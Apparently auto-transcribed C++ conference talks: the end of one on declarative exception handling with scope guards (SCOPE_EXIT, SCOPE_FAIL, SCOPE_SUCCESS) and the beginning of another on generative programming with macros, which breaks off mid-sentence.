fantastic trifecta here that's really nice and flow declarative. It's very pleasant to work with because it doesn't complicate code at all in the country, it simplifies it. And notice that, you know, the whole deal here is that we don't need to specify flow explicitly. This is beautiful. So, it's going to take care of all the tries and catch and finally and what not. It's going to be all automatic. All I need to do is make sure I plan things properly. These sort of scope hooks in my program. So, you know, just like in other examples of declarative programming, I'm declaring circumstances and goals. So, you know, this is sort of the new part for this talk compared to the workshop. This is doable. We can do it as it was today. And here's how. So, there's a proposal that you may want to peruse, 3614, which essentially makes this Holy DM portable to all compilers. But I'm going to show you today is code that works for GCC and Microsoft. Who uses GCC? All right, Microsoft? All right, Microsoft thing. Awesome. It's like 4060, right? Excellent. Who uses something else than these two? One guy. Okay, you can go. Okay. It may become 100% portable. So, it's, you're not wasting time. I have to give credit where it's due. Evgeny Panasyuk from Russia, he wrote me and he said, oh, you said that if you're, if anybody knows how to make this work, you should write. So, I'm writing. So, he wrote me and he has, he had the full-fledged implementation going. So, he has credit for most of the work. Also, Daniel Marinetskyou, he implemented Evgeny's idea in sort of basic approach in Facebook's Folly library, which I highly recommend you to look at. It's an open source library of high-performance C++ code that we use intensively at Facebook. And it's, you know, it's growing by the day and it's a great library that has a lot of interesting stuff in it. All right. So, to start with, I'm going to build a bit of scaffolding, a bit of helpers, right? And my first helper is going to be an uncaught exception counter. This little artifact is going to count how many uncaught exceptions are right now in flight. Okay? And here's some private data that we're going to get, some private stuff that we're going to get to in a minute. But the interesting part is, well, the constructor is going to initialize the exception count to the current uncaught exception count. And we're going to have a query which says, is new uncaught exception, does this scope that this object is in, did it generate an exception right now? And it's going to return that the current get uncaught exception count is greater than the exception count I saved when I entered this class' lifetime. So, consider this. Code flows, an object of this type is created. I saved the get uncaught exception count. Let's say at this point there's like zero exceptions in flight. There's no exception. And then later on, if somebody does throw, I'm going to call this function, easy uncaught exception is going to return one true because one is written as zero. I'm going to have an exception in flight. What if I'm going to, it just could so happen if I try catch and decide to have objects constructed and other try catch and you know, stuff like that. It could be the case that there are several exceptions kind of waiting their turn. They're not all flying at the moment per se, but they're kind of waiting their turn. And that's why who knows here about stduncaught exception, stduncaught underscore exception. Okay, so, yeah. Okay. I'm glad you don't because you shouldn't. It's wrong. It's not a good thing. I just wanted to preempt the question of, oh, how about that stduncaught exception? What's going on with that function? It doesn't work, essentially. And you can, if you Google for articles on the uncaught exception, you're going to find why. All right. So, of course, you know, this is a simple thing to look at, but the key here is like, you know, how do we implement this getuncaught exception? Here's where the interesting, you know, dragons come about. Well, on GCC and Clang, all you got to do is two casts, an undocumented function, and add the size of white star, and you're done. That's it. It's a very simple thing to do and very, very understandable. It's self-documenting code. The keywords are blue, right? So, is there one underscore too many here or here? You're kidding. Okay. Yeah. If you have too many underscores, then you probably missed a few. So, all right. So, what happens with this is, essentially, it peaks into the global data section of the running program, and essentially, you know, kind of bumps it up a little bit, and it just happens to access the actual counter, the value of the counter in the running program, the exception counter, and it just fetches that guy. All right. So, this is pretty nice, and it's undocumented, but it is sort of internally documented. So, you know, Evgeny kind of looked it up in unwindcxx.h and kind of figured it out how it works, and it's been working reliably since a few versions away. So, you can count on it. And we need to declare some externals just to make this work. We're going to say, well, extern, c, these are my globals, and there's an opaque structure there. So, pretty much with these two pages of code, I mean, this little code, we have the exception counter taken care of. That's for GCC and Clang. Well, in MSVC, the story is a bit less portable, because, for example, versions previous to 8 could not work with this. By the way, who uses MSVC 8 or up prior? Okay. So, there's more, well, talk to your manager, upgrade. It's a good product. They don't pay me, but you should know. I don't use it. So, all right. So, I'm seeing a bug is very interested in this whole deal. All right. So, in MSVC, we kind of have to introduce similarly a few opaque declarations and things like that. And, you know, we're back to the same deal where we get Ptd is going to return our global data segment, and then we're going to do a little arithmetic to peek into the right place for the global, for the exception counter. Nice. So we have these. They are not slow. So these are not all of them functions. They don't do unwinding. You know, a lot of this get Ptd thing is just one or two in directions away. It's a simple data access. And similarly for GNU, the CXA get global is also one in direction away. So we're in good shape. It's a cheap function. It looks hairy, but it's cheap. All right. Well, now we're done. And let's kind of use now this scaffolding that we created. Let's use it for fun and profit. So for that, we create another helper class called scope guard for new exception. So this guy is going to call the, is going to automatically call a function which could be any piece of code by is of land us whenever a new exception is being thrown. So we have a function which this is the guy I'm going to call. And I have the unquoted exception counter that we just defined. And this is my state. And my public data, my public interface is going to be, I have a constructor that takes the function. And this most of the time, this function is going to be a lambda because the macro, remember the macro had that lambda starting thing, right? And then it's complete to a lambda. And that lambda is going to make it here and closes the deal, right? It makes it very, very easy to use and very pleasant. All right. I love this flight. I really like C++. So we have the initialization. We have also some sort of a bit of a repetition here because the, you know, the land us can be expensive to copy. So we have a move or a kind of thing which is going to move things. I'm glad that Nico and Scott predated this talk so they, you know, can, they explained the new feature of, relatively new feature of moving data around. And the interesting action happens in the destructor. Where it goes like this, well, the destructor is no except if the Boolean executant exception, which is a sort of a policy parameter, is true. So it's a, this is a conditional no except. And fortunately, like a modern compiler, all these support that, which is nice. So it's no except if executant exception is true, right? And if executant exception is the same as exception counter is new unquote exception, then it means I need to execute a function. Now, if I pass a false to executant exception, it means I'm not going to execute an exception. I'm going to execute if there's no exception. Remember scope, so we have scope exit, which is done. We have scope fail and we have scope success. If you want to implement scope fail, you're going to pass a true here. If you want to implement scope success, you're going to pass a false here, right? That's why this Boolean is needed. We want to implement two artifacts with only one piece of code, right? So this, you know, the whole Boolean executant exception would be a sort of a policy parameter kind of thing. All right. So far, so good? Questions? All right. So let's recap where we are. So we have, I'm going to turn back a bit. So what we have are the exception counter that tells me whether the current scope is throwing an exception right now, right? We have the implementation thereof in the two popular platforms. And now we're going to use that guy with this class that's going to say, well, scope gar for an exception is going to, depending on this Boolean policy here, is going to execute a lambda function. If an exception is being thrown from the current scope or on the country, if an exception is not being thrown by the current scope. So I'm sure like if you kind of sat down together for a minute, we can all figure out how to use this guy with a macro to make scope fail and scope success work. Nico, did you talk about DK? Is Nico here? Did you talk about DK yet? Okay. Okay. So, well, go to the future. At the Nico's talk, come back here and here we are. It just worked. Back from the future. So as the DK is just a bit of noise that kind of takes care of adapting, you know, decaying parameters from arrays to pointers and such. But essentially what I'm doing here, I'm defining that operator plus scaffolding that you may remember in the beginning when I implemented scope exit. It just serves for me to define the macro in an infix manner such that I can write things like scope fail or whatever and then I open a curly brace and write code. And part of the macro, there's the parenthesis and the capturing part. And then the user writes only the curly braces part of the lambda. So it looks really nice like a pseudo statement. So this is my purpose. So I'm generalizing that guy to an operator plus that takes essentially an unused value of a unique type and it takes the lambda and it's going to return a scope guard for an exception with true because scope guard on fail goes to true. All right. So far so good. So I have a simple class that says scope guard on fail and then I pass a true here and I create a new scope guard. Of course, we're going to do the same thing for the success case. So we have a unique type scope guard on success. By the way, all the same new class business, you could write a struct here. It's the same thing. But I have to kind of make it a sort of economy of means. This really is a sort of a type with only one value or something like that. It's kind of an interesting, you know, in-event class, this guy, in-event with no members. So, you know, essentially I made a career out of writing code that does nothing because like that, if you remember like my template code, it's all like declarations and that do nothing and then it's like you essentially use size of and it's all size of compute something, right? So stuff that does nothing is very interesting. So I like it. And here we have pretty much the same code as before except it's going to pass false here because I want to execute this code in case of success, not failure. All right. So far so good. And now let's assemble this stuff into macros. No. Which I... Okay. Let's go back and go with the macros here. Here. Okay. So DefianceCodePagsy goes like this create an anonymous variable, detail scope guard on exit plus the beginning of the lambda. DefianceCodeFail, DefianceCodeFail, anonymous variable scope fail state, detail scope guard on ex... Scope guard on... Quick, quick, quick, quick, quick, quick. Scope guard on fail. Okay. I have a college degree to manipulate this thing. Okay. So I'm going to... In the scope exit case, I would use an enum of type scope guard on exit. In this case, I'm going to use a scope guard on fail and in the third case, I'm going to use a scope guard on success. So that's how I define the macros, the three macros that are helping me. Scope guard on exit, fail and success. And that's all I change in the macro definition. There's going to be three macros each is going to be very similar with this, right? And at this point, I have the entire Troika containing exit, fail and also success. So essentially, we have a nice declarative battery of things that I can specify if the current scope is successful in error exit by an error or whatever, just execute this code. Simplifies a lot of code. We have quite a bit of experience with this construct and actually other languages are trying to borrow it as well. So I highly recommend you try it. Now, let's see a few cases just to wait your appetite. Let me see. Okay, great. Perfect. So let's look at a few cases. But first, actually, there's a slide that I kept on running over. Who noticed that? I don't know. If there's no hand, I'm not going to go to that slide. There's always two hands. Okay. So let me go back to the slide and explain you the dirtiest aspect of it all, which is you're going to hate this, this guy. So there is a way to define an anonymous variable using the preprocessor. And it's not intuitive and it's weird. So that's why you should know it, right? That's why you should know it and use it everywhere you can, right? Because that is the CPU process spirit. So, well, we'll start with a simple macro that concatenates to tokens. So the way it goes is, you know, essentially, you need to use the token-pacing operator, pound-pound. This is like since the days of C, it's there, right? But the thing is, you've got to use a little indirection. So the way it's implemented correctly is concatenate token-1, token-2, symbol-1, symbol-2. You forward to another macro concatenate, IMPL, from implementation. And that guy is going to do the actual pasting. If you don't do this, you're going to concatenate the names of the macros you're trying to concatenate instead of the values of the macros. So that's why I need an extra indirection to give the chance of those macros to get expanded, okay? All right. And now there's this artifact present in all popular compilers, which is called under-under-counter-under-under, which whenever you use it, it's going to increment its value. So whenever you use counter, it's going to be, you know, first thing is going to give you a 1 and the second is going to be a 2 and so on and so forth. So it's a nice auto-incrementing counter during compilation. You can use it for fun and profit, such as in defining an anonymous variable, obviously, for some definition of obviously. So let's define an anonymous variable of some heading here, some prefix, concatenate that prefix with under-under-counter. When you invoke the concatenate macro with these guys, you're going to say, well, whatever you pass here, like, hello, pass like the symbol hello, there's going to be a hello here, and then there's going to be the counter, whichever value it has currently, it's going to be concatenate. So I'm going to get hello 42, and that's going to be a name. But next time I'm creating an anonymous variable, it's going to be hello 43, which is going to be a distinct name from hello 42, hence the notion that I'm generating variables really easily, right? And if your compiler does not implement counter, which is like this guy, because there's only one hand that said I'm not using GCC neither MSVC, both of which implement that thing, if counter doesn't exist, you can do the same trick with the current line. The limitation here being that, you tell me, what's worse about line than counter? You can't define to anonymous variables on the same line, right? And, you know, but, you know, by John Carmack, John Carmack's famous quote, if it, if anything works, it's going to appear in your code base, you know, because code base just growing, if whatever is syntactically sensible is going to be there. So it is a risk. So this is sort of an unpleasant thing about line, which counter fixes. And this whole thing is quite portable because, you know, if def counter, you're going to do the smart way and else you're going to do the more limited way. So far, so good. So this is how you create anonymous variables and to complete the whole thing, here say auto anonymous variables, so here's going to be scope exits, they follow by a number, right? And then you have detail and stuff. By the way, this is anonymous variable, if you go to github.com, Facebook, Folly, you're going to find that we use that in a lot more places, on our new variables. We use them for a variety of other pseudo statements, so for synchronization and locking and stuff. So pretty neat. I recommend you remember this. By the way, the slides are going to be available to, I think to everyone, I think we're going to publish them, but just in case you're in a hurry, just shoot me an email and I'll send them to you. I have the Q-test email in the world, by the way, aaatfb.com. So got to love that. It's easy to remember. Okay, let's see a few use cases now. So, all right. Well, the simplest is, you know, these are sort of taken from actual code. Well, login and if login fails, then I'm giving sort of a login line here, what happened. And it's nice because if you have an exception here, you're not going to see that we're trying to login. What you're going to see would be something like database connection timeout, right, or something like that, networking timeout. And what the hell was I doing, right? Where was I? What was happening? So this is going to nicely log the fact that you're attempting to login and it didn't work. So this is in a way more information than just the exception. This is sort of a beef I have with the exception. They kind of give you the low-level reason, but they kind of don't try, don't kind of give a good account of what's happening. So you got to look at the stack trace, which is sort of low-level and stuff like that. So this is nice. It's a high-level trace, the stack trace. So, all right, shows major failure points easier. And this is user, you can show it to the user and things like that. Nice. How about doing some transactional work? And here, careful. Well, we're creating a file and we want to build it in a way that's not going to ever create an invalid truncated file. And to do so, we're going to say, well, let me create a file that has a suffix dot delete me or whatever you want. Dot temp, dot in progress, in construction, fragment, whatever, right? And then we're going to open that temporary file and we're going to make sure that the creation succeeded. And then on success, we're going to close the file and we're going to rename it to from dot delete me to the original name, which is the right thing to do. So this tells me what I, you know, declarative manner tells me what I need to, what I'm supposed to do in case the whole thing works, right? Well, on failure, if things do not go the way we planned, I'm going to close the file, attempt to close the file, but not caring if that F close fails. I'm not going to kind of worry about it because we failed already. So this is kind of a courtesy call. And I'm going to attempt to delete the file. And if worse comes to worst, I'm going to have a file with the extension dot delete me on the disk left. If anything, if the worst happened, which would be probably like on link doesn't work and things like that, right? So far, so good question. What if I swap these two, what if I swap the two pseudo statements, scope success and scope fail? Yes? What happens if you fail to close here? Excellent question. But, you know, it doesn't answer mine, but let's work on this guy. What do you think happens? Anybody? Everybody? Well, if it fails, then I'm, first of all, will the program terminate? Like badly? Like with the program, will it be aborted? Will the program be aborted? No, because scope success is going to be invoked if and only if the current scope is not left by means of an exception. Remember, destructors are through our bad. And this land actually is actually within a destructor. But because of the whole amenity we've made ourselves, we've produced for ourselves, but we know now that the destructor is executed in a non-throwing manner. So it's okay to throw from a destructor. So scope success is allowed to throw. Okay? Because of that, so the whole thing worked, like the dot dot dot here is like whatever I need to do to create that file to write to it with via the handle F. So scope success is going to be executed at the very end of the function in the case the whole thing worked. And then if it, whatever it did worked, but your closing statement did not work, then it's okay to throw. You're going to just throw and everything's going to continue with that exception. So scope fail, can it throw? Right. So scope fail, it cannot throw and is actually a compiler could warn about it because, let me kind of go back here, here. Because of this flag here, the compiler may warn you that a non-no accept function actually you're trying to throw away from it, right? And actually GNU does that kind of stuff. It says, oh, you have a no accept function, you're trying to actually throw exceptions and stuff. So in scope fail, you don't want to throw because throwing from scope fail essentially terminates the application immediately. It's the classic case in C++ exception with an exception, that's not allowed by C++. It's just going to terminate the application abruptly. It's probably never want to do that essentially. So this is nice. It's a lot better than C++ 98 and, you know, the previous scope guardians and everything because they have some quite nice statically checkable kind of approach to this kind of stuff. So now, let's get back to my previous question. What if I swap these two? It makes no difference. Why? Well, because, so, okay, so let me repeat, make sure I understood, because per declarative programming's general ethos, the order shouldn't matter. Actually, it does matter in general. In this case, it doesn't matter because scope fail and scope, the scope fail and scope success, they are opposites. So they can't, they're never going to execute at the same time. Yes? I don't think it does matter because if you force those exceptions, now it will not get called. This guy? Not in 4T, that one. Okay. If that one throws, now it doesn't get called as scope fail because that one has already been destroyed by the client. Oh, that's right. Yeah, excellent. If you swap them around, it will get called the same. Yeah, but here's the thing. Okay, so actually, it's a better code to move the scope fail above because in that case, you're unlinked the file, too. Right? So, okay, so let's move scope fail above scope success. In that case, the whole thing is, oh, no, no, no, no, no, no, no, no, no, no, because the scope fail is done already by the time you reach scope success. Yeah, but oh, yeah, because of the stack. Okay, so let's move scope fail above scope success here and then we're going to say, okay, so let's say the whole code is about to succeed. I'm going to throw from F close at that point because scope fail was before, I'm going to attempt again to F close, but this time I'm not going to care and then I'm going to unlink. Yes, it's better to put scope fail before scope success. Thank you. My slides keep on improving. All right, thanks, Sam. Yes? Isn't it easier just not to throw from success? It would be easier to throw, to not throw from success, but generally you want to have that liberty. It's sort of, it's important to be able to throw when you can. All right, very nice. Thanks very much, Sam. All right, and, you know, as I said, the order seems matters and this sort of reproduces what Sam just said. It's better to move the scope fail above. Oh, here I kind of said, plan it too early. Give me a minute. No, the thing is I was scoffing at this notion that I'm going to essentially, that I'm going to attempt to close the same pass and I'm going to essentially, if I can't close this guy, I want to just fail as fast as possible and as swift as possible and just be done with it. All right, so please note, only scope success may throw. The other two are not allowed to. In scope fail, if I throw it's guaranteed sudden death and in scope exit, it may or may not die, right? In scope exit, it's like either case and, you know, it could be exited by exception or it could be exited however. All right, post conditions are great with this scope success because whenever the current scope is exited, we cannot assert that the post condition is going to be, continue to be satisfied. And actually, I've seen, you know, I've seen people define classes for that purpose, right? They say, you know, I have a class and the instructor is going to do the checking and that kind of stuff. Same about things like invariance and such, right? Gigi.Guard, a common trick that people use is to, you know, whenever they want to do high performance code and there's a buffer, there's a length and essentially you're searching for a specific character. This is sort of a fast idiom for searching things. And you're actually, you have a buffer and you plant what you're searching for at the very end of the buffer. So you don't need to check for is the buffer done yet. So you can just go straight through it without any checks, right? And that idiom is nicely completed by a thing like scope exit which restores the last character in the buffer. So by the way, I recommend this idiom for efficiency. It's very good for writing lexers and generally language process that might be, must be really fast because what you do is for each point in the buffer, no checking for the buffer ending, you're going to have a switch of give me the next character in the buffer and here among the other cases, you're going to have a case of 255 and you're going to be done, right? Now, what's the advantage, what's the speed advantage of this guy compared to the classic for each character in buffer? Yes. Thoughts. Why is this faster than the classic for each character in the buffer process the character? Yes. There's one less test. There's one less test. Actually, there is still the test because in the switch here, I'm going to test for 255. There's still one test. But the cost of the test is going to be divided by the number of cases in the switch statement because the switch is going to be a table lookup, right? So instead of testing each time, I'm testing, am I done yet? Am I done yet? So I'm testing each time in the bad case. I'm testing each time and then I have the switch. I'm going to handle the character. But in this case, I'm testing and handling simultaneously in the same switch statement and that's going to make everything, actually, this doubles the speed roughly of a lot of simple language processing. So do remember the CDM. It's highly nice and not very well known, actually. All right. And you know, the whole, this is a nice CDM and scope X, it kind of puts the icing on the cake because it makes it a one liner to not forget to restore the buffer as you exit the function, right? So you're not going to mess things up. All right. Scoped changes. I've noticed this, too. This is also sort of a classic. Well, I want to, I have a global sweeping and this is a sweep, you know, in a program. It turns out to be called from HHVM. So I'm setting at the end the interest in the function setting this global to true. I'm sweeping right now. It tracks whether or not I'm inside sweep and when I exit the scope, I'm going to have restored the sweeping to false and then I'm going to do stuff. So this is nice. Of course, I could make a class for that. Any use of scope X, it could be supplanted by, replaced by using a class but actually with scope X, it is very simple to just get away in two lines instead of writing the whole class. All right. So whenever we have some transaction but you don't have an RAI type built for it, it's very easy to kind of, well, did you have a thing for file locking? Maybe not. So I could build a class for file locking if I use it everywhere but if I use it only occasionally, I can just get away with saying, well, F lock and then enforce F lock unlock and then done. By the way, this enforce here is going to cause that sudden termination but essentially I looked at the documentation and this actually can't fail. If you call lock, it's never going to fail, which is a nice thing. So, you know, make sure that you do the right thing whenever you throw from scope exit. Yes. Is this better to use than unique pointer? Is this better to use than unique pointer? You tell me. Unique pointer to what? You can specify what you do in scope exit. You can specify as a unique pointer. That's the thing. So just repeat for the record here because I'm going to destroy Niko in the next minute. The comment was you can use a unique pointer with a custom deleter and it's nice, right? My question is unique pointer to what? I could have a unique pointer to void star, to void, to pretty much nothing or to an int that doesn't exist and use the custom deleter. Is that correct? Right. Well, my question is which code is going to look goofier? One that says do this and when the scope exit do that or one that says, oh, let me create a unique pointer to nothing and by the way, I'm going to specify a custom deleter and if you don't know what it is, run to the find man, read the find manual RTFM. That's what it stands for, right? Read the find manual. All right. So you could, you could do things like you could write your own class, fire locker. You could use a unique pointer with your stuff with a custom deleter. You could. I'm not saying you should and, you know, so there's taste to be applied in all of this stuff, right? All right. So I'm closing remarks. All examples are taken from actual production code. It works and kind of pleases people and is readable and interesting. That's not trivial stuff. Notice that the declarative focus is going through all of it. So we're going to declare contingency action depending on the context. Scope, fail, exit and success are going to be more frequent than try new code. This is my experience with the idiom. And the latter remains in use for actual handling. So try is going to still be used whenever you actually want to handle the error as opposed to doing stuff with your own code in case an error appears. So if you want to handle the error, say try, catch, you catch the, et cetera, and kind of deal with it. You kind of print it, display it, whatever, right? Retry, et cetera. So scope, this scope stuff is just for kind of managing what your code should do if something bad happens. But if something bad does happen, you're going to have to handle it at some point, a high level in the application. The flow gets flattened. So the control flow gets, you know, no more ifs, tries and stuff. And the order still matters as we discussed. So it depends on how you plant your handlers. And some just destroyed my slide because I advised against what I should be doing. All right. To summarize, this is it. Questions. All right. So I'll be here for a few more minutes. I'll take these offline, okay? I'll be here for a few minutes. I'm going to, I want to let you eat some cookies now, okay? Thanks. And don't forget the feedback while the, you know, while the, while the trauma is still fresh. Thank you very much.
Getting exception handling right is a perennial problem in C++ that has eluded systematization. Not for much longer. New language and library developments make it possible to handle exceptions in a declarative manner, leading to drastic code simplification. This talk discusses an alternative approach to handling exceptional flow that eliminates the need for small ancillary RAII classes, try/catch statements that rethrow, and other cleanup mechanisms. The popular Scope Guard idiom gets a spectacular generalization. Statements specify in a declarative manner actions to be taken if the current scope is left normally or via an exception. The resulting code is simpler, smaller, and easier to maintain.
10.5446/50578 (DOI)
Ladies and gentlemen. Gentlemen. So I'm going to talk about generic and generative programming C++. And when I prepared this class, I was told repeatedly by Olwe and other people advising me on this conference to say, oh, go easy on them. Don't teach the advanced stuff because, you know, you're going to lose everybody and stuff. And now I see that the most hardcore C++ diehards are in this room. So I hope this is not going to be an underwhelming experience for you. Don't forget, when in doubt, green is your favorite color. That's what you need to do. Let's move forward. Don't forget that I also have a talk tomorrow morning. I forgot the exact time, but it's going to be on the D program language, and you should join me in more than one sense. So JD programming is, and here is the point where I need to have your participation. What is generic programming? Let's define it because I notice that many people talk about things without having defined them well, and they believe, you know, it's kind of difficult to keep something at a vague level and at the same time discuss it. So what do you think is generic programming? Who can kind of give a somewhat precise definition? It doesn't seem to be precise. What does it mean to you, generic? Not generic, generic programming. Ideas, thoughts, yes? Generate program code inside your program at one time? Generate, yeah, exactly. So I think you're almost like, got my text, is writing code that generates code, right? So as soon as you have a piece of code that you write that in turn generates code, boom, you're doing generating programming, awesome. So now the thing is, it's always get weird. I've written in my time, I wrote a lot of code, like I've written things like PHP that generates JavaScript. C++ that generates C++. D that generates C++. D that generates D. And, you know, there's a lot of combinations that are possible there. And the odd thing is it puts your mind into a weird state because you need to think about two things at the same time. One is what your code does and what the code generated by your code does. And that's almost always an eerie experience. So when do you need this kind of eerie stuff? You need it mostly when you're seeing symptoms like you have a solid duplication in and across projects. You have like, there's almost the same code. It's always, there's always five differences that you can't really catch, right? So you're always kind of to have to, for example, copy the same 300 lines in an application without even understanding. We are having this phenomenon at Facebook where we, who knows about like Thrift? Thrift is a very nice transport package that knows how to serialize objects and implement services easily and high performance. Google has a similar package called Protocol Buffers. And essentially any high bandwidth company is going to have such an inter-operation code for distributed computing. So Thrift allows machines to communicate with one another and exchange information call functions remotely and things like that. And we have this funny story at Facebook like everybody like, oh, let me implement a Thrift server. And what do they do? They go and copy and paste their last server, right? Which was pasted from the previous server, which was pasted from a previous server, which was pasted from an example that the first guy who implemented Thrift wrote, right? Because everybody knows, oh, this is the code that works and this is the code that works really well because somebody in the beginning kind of sat down and implement a really good performance server and everybody's copying the same code over and over again. So it would be nice to be able to implement a server in just a few lines of code. And have enough configuration and tweaking knobs to be able to make it work in any way you want. So such tweaking and knobbing and whatnot is impossible to cope with the traditional abstraction techniques. We've tried to do some stuff about the Thrift servers, but essentially it turns out to be there's always one little thing you want to configure. There's always one little thing you want to have different and it matters because performance does matter. So another completely separate case of generative program deficit would be things like you need to maintain parallel class hierarchies that look the same in shape but do different things. But they must stay in the same shape. Otherwise the program is wrong. And the classic is things like factory hierarchies and visitation hierarchies and things like that. So highly unpleasant. Another thing is which has become sort of an endemic problem in certain projects is things like you have many points of maintenance. To do anything you've got to modify programming in three distinct places that are like span multiple languages even and multiple servers and things like that. And actually this is taken from a production, an old production project. At a table column you need to change four places. C++, C++ module of PHP file, Thrift file in the Python script. I'm not kidding. Who here has seen stuff like this? Be honest. Okay, that half, be honest. These guys, okay, it's like waving. Okay. Terrific. So this is generating programming with C++. It's not generating programming with templates which I'm notorious for. But I found that macros are a valuable tool in generating code. And this is taken from C++ linter that I wrote a while ago which is actually open source if you look for Flint on GitHub you're going to find it. And this C++ code has since been overridden but it's a very good example, a standard example of how you can implement a non-trivial processing program with high performance using a generating technique based on macros. So define, so let me teach you this important idiom for generating code in C++. So apply here is the important, the interesting thing. It's a parameter to a classic like macro, right? It's a parameter to the macro and it's used in a call as if it were a function or a macro itself. So this is key. This is unusual because usually people say they define something, it takes an argument and then it uses the argument somewhere in this position like as an argument for other stuff. In this case, it's a sort of a higher order function if you wish, only done with macros. It's a higher order macro. Here we just invented a whole new, not the denomination for this kind of thing. So and it says, well, apply, whatever the hell apply is, apply this guy to the tilde and call it token tilde. These are some sort of a constant it would seem. We're going to get to that soon. Apply open parent to L parent and so on and so forth. And notice that all of these are C++ tokens that you may recognize. So this is sort of a C++ tokenizer parser lexer that recognizes C++ tokens, right? This is the idea here. We want to kind of tokenize texting to C++ fast and we want to be able to support the whole token, you know, the entire token paraphernalia of C++. All right. Well then we have sort of a kind of a different thing because these are one character tokens, but then we have, well, one or two character tokens and we have a, you know, again we have a higher order macro where we pass the supply unknown thing. We pass the supply to this macro which is going to generate well applied colon and it's a TK colon or a second colon which would lead to generate the token double colon. So in C++ there is a token which is a colon and there's a token which is two columns next to each other, right? And that's a different token. That doesn't have anything to do with one colon. So you've got to generate a different token. So you see this macro, CPP-Linfo, one or two character tokens is going to generate all C++ tokens that have one or two characters, right? Wait, the plot three cons. What do you think follows? One or two or three, right? Okay. So but, you know, again we don't know yet what's going on with these guys. What we do know is that the first macro here is going to expand the apply for the, you know, the right character and the token symbol for everything that's one token character and then this guy is going to expand whatever apply is for one or two tokens, tokens containing one or two characters. All right. And I stop here because there are a couple of three character tokens, shift, shift equal and stuff that are too few and I did it by hand. So that's fine. So now here's the initial thing. We say, in your token, so now I'm using the macros, the generative macros and it's going to explode into a bunch of code and you haven't seen it yet because everything yet because this is not a lot of code that's going to be generated. So let me define an apply function that given A and B just expands to B comma and then I say CPP-Linfo for all one character token, CPP-Linfo, one to apply. What is it going to expand to? Yes? No, somebody else. Sorry, sorry. Yes, everyone question. You only, no soup for you. Okay. You only get one question each. What does, so okay. So let's get back to one character token. So this guy has applied argument one, argument two and the way it's used by this guy is, let's take the second guy and follow it about the comma. What does it expand to? All of this wonderful column here, all of this column here with tk underscore blot, with commas following it. And guess what? Because it appears inside an enium definition, enium token, open curl, I defined this guy to be B comma, then I expand this macro which is going to nicely expand all of the tk underscore names. So I'm going to have an enumerated value that is going to nicely create all of the token names for me, which is nice, right? And then I'm going to have, I'm undefeating this guy, so I kind of want to maintain some cleanliness here as much as it's possible with macros, no further comment here. And I'm going to redefine it, something that takes four parameters and I'm going to expand B comma, D comma. Well let's see what happens if I expand this guy now, or it's going to take this column and this column is going to expand both. So all of a sudden, with five lines, I've got all the token names in one place in an enium, like, everything. And the total tokens in C++ is like, I forgot maybe 120 tokens or so. There's plenty of types of tokens. The thing is, I generate them real easy with just the five liner because of the generative abilities of these pesky macros. And then, you know, there's, there may be some fix ups that I do by hand, like free character tokens or stuff. I could, you know, there's options. You can actually see the production code online. So very interesting, but so far it's like, okay, so you put some macros in some, what did you really do? Is there any, anything interesting about this? Well, there is if you use them more than once. Because if you, you know, an instruction that you use only once is kind of, okay. But let's use it a second time. Well, and here's the high performance part of the code, which goes like this. Let me put it this way. Any FAST program is going to have two things. An infinite loop and the switch statement. If you don't have those, your program is not fast enough. Okay. Now I'm only half kidding. Because the infinite loop is going to be a loop in which inside you have complete control of what happens and it's followed by an unconditional jump to the beginning. And it's going to be like the fastest construct ever possible. And inside you kind of have conditionals and, you know, you carefully look at what's going on. So here I want to write a really fast function. The first thing I write is I write the infinite loop and then I organize myself inside of it. And second thing is switch is like the most efficient way to take multiple decisions. Because the compilers have gotten amazingly sophisticated optimizing switch statements. So they analyze the table, you know, what's going on, the cases. And they either generate, they generate stuff that doesn't even look like, you don't recognize it in assembler, how it looks compared to the initial switch statement, which was like very tame and ordered. And they generate code that's completely bizarre. Okay. So don't forget, if you are fast, infinite loop, switch. That's it. So well, the infinite loop is kind of outside this guy. Okay. So you don't see it, but it's there. All right. So, well, we're going to switch the opinion of the next character in a C++ file, source file. We want to kind of tokenize this guy. So then we kind of define CPP lint apply a different way. So we say, well, CPP lint apply C0, T0 is going to expand to case C0. And I put some presses here just to make sure there's no weirdness in expansion. And same here, same thing here. Does not just good style. Generally, it's not nothing bad is going to come out of it. So case C0, T, which would be my current token gets T0 and token length is one. Because we know it's a one character token. And then I'm going to go to insert token. I should underline not all fast programs contain go to. Okay. But it's allowed as long as it's inside the macro. If you generate go to with a macro, that's fine. If you write it by hand, it's not as fine. And again, I'm only half joking. Except in destructors. Except in destructors. Yeah, in destructors you're allowed because those must be very fast. Okay. So this is an internal joke for those of you who've been at the workshop. So we have this macro, which is going to expand to case assignment or length and go to. And then we're going to expand this guy. Boom. All right. Let's analyze what the expansion looks like. Well, getting back to this guy. Well, it's going to say case this character. Token gets tk tilled. Token length in goes one, go to. Right? So very nice. I generate a bunch of case labels here. A lot of cases with this one macro expansion. And I'm going to say under fcpply and I'm going to continue with what? With the two character tokens. And at the end of the day, what I'm going to have is again a very compact notation that is going to, during compilation, expand into a humongous quantity of labels and code and stuff that's going to be very regular and very fast in nature. Okay. This is the macro for two, which is a bit more complicated. And it has a little decision tree here because we're looking at two tokens. So well, let's see. C1, T1, C2, T2. Character one, character two, token one, token two. Case first character is C1. I should have had parentheses here just to be nice. If the next program counter, so the next character is going to happen to be C2, then I know it's a two character token. So I'm going to do T gets T2, right, and the token length is two. And otherwise, it's a one character token because my look ahead failed. So I know that it's going to be a one character token, so I'm done here with T1 and token and one. And then go to insert token and again I'm expanding all of these guys. So if you look at the generated code after this preprocessing, it's going to be a lot of these token expansion mini snippets that are going to be hidden inside a switch statement which is going to be hidden inside the infinite loop. And this is going to run like a bat out of hell fast, okay? Questions so far? So higher than macros, right? Makes sense? All right. Well, but templates are kind of the cool way to do C++ generative stuff. And actually there's a subtlety to it because many people say, oh, I'm using templates on, I mean, what's the deal with generic, generative, templates, macros, code generation, all that stuff. I mean, there's kind of a confusion of terminology here. Well, in a way, C++ templates are inherently generative because they use the so-called heterogeneous translation. So let me explain this a bit. In program language theory, there are two ways of generating code from generics. One is called to translate generics into regular non-generic code. One is called homogenous translation. Let me explain first. So in homogenous translation, you're going to have all instances of the generic construct. They're going to share the same binary code, the same generated code. Which languages use Java? Java would use homogenous generation, transformation, right? Because in Java, no matter how you use generics and such, they're going to be reduced, essentially, type your raised into the same, you know, byte code and ultimately binary code, right? So there's this homogenous process in which essentially generics are just a trick, a syntactic trick in a way over the same code. And what's the advantage of using homogenous translation? You get, there's got to be advantage, pluses and minuses for everything, right? Code is going to be more compact, smaller. Backward 